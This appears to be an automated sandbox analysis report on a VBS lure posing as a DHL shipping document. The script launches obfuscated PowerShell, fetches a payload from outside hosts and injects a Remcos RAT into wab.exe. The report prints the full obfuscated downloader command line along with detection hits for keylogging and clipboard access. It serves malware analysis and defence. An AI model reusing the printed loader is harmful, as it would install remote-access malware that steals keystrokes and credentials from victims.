              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: bhvB999.tmp.19.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhvB999.tmp.19.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhvB999.tmp.19.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exe, 00000013.00000003.2001386225.000000000398B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhvB999.tmp.19.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhvB999.tmp.19.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhvB999.tmp.19.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.c
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.co
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/N
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Ne
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Ned
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Neds
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedsl
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedsla
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslag
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagn
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagni
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnin
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagning
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnings
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnings.
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnings.d
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dw
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dwp
              Source: powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379A562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dwpX
              Source: powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: bhvB999.tmp.19.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhvB999.tmp.19.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-09-10-14/PreSignInSettingsConfig.json
              Source: bhvB999.tmp.19.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=6c2de995c290b031854b
              Source: bhvB999.tmp.19.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=eafda5
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhvB999.tmp.19.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhvB999.tmp.19.drString found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
              Source: bhvB999.tmp.19.drString found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
              Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhvB999.tmp.19.drString found in binary or memory: https://www.office.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60918
              Source: unknownNetwork traffic detected: HTTP traffic on port 60918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownHTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:60918 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0041183A OpenClipboard,GetLastError,DeleteFileW,19_2_0041183A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,19_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,21_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,21_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,22_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,22_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_7792.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Potential malicious VBS script found (suspicious strings)
              Source: Initial file: Call Elevarbejder.ShellExecute("P" & Anyone, Ergometercykelen, "", "", Aalegaard)
              Sample has a suspicious name (potential lure to open the executable)
              Source: DHL Shipping Document Awb & BL.vbsStatic file information: Suspicious name
              Very long command line found
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4250
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4250
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4250Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4250Jump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_04586E09 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,10_2_04586E09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,19_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00401806 NtdllDefWindowProc_W,19_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004018C0 NtdllDefWindowProc_W,19_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_004016FD NtdllDefWindowProc_A,21_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_004017B7 NtdllDefWindowProc_A,21_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00402CAC NtdllDefWindowProc_A,22_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00402D66 NtdllDefWindowProc_A,22_2_00402D66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886EEB5062_2_00007FF886EEB506
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886EEC2B22_2_00007FF886EEC2B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0481F1F05_2_0481F1F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0481FAC05_2_0481FAC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0481EEA85_2_0481EEA8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B3719410_2_22B37194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B2B5C110_2_22B2B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044B04019_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0043610D19_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044731019_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044A49019_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040755A19_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0043C56019_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044B61019_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044D6C019_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004476F019_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044B87019_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044081D19_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0041495719_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004079EE19_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00407AEB19_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044AA8019_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00412AA919_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00404B7419_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00404B0319_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044BBD819_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00404BE519_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00404C7619_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00415CFE19_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00416D7219_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00446D3019_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00446D8B19_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00406E8F19_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0040503821_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0041208C21_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_004050A921_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0040511A21_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0043C13A21_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_004051AB21_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0044930021_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0040D32221_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0044A4F021_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0043A5AB21_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0041363121_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0044669021_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0044A73021_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_004398D821_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_004498E021_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0044A88621_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0043DA0921_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_00438D5E21_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_00449ED021_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0041FE8321_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_00430F5421_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004050C222_2_004050C2
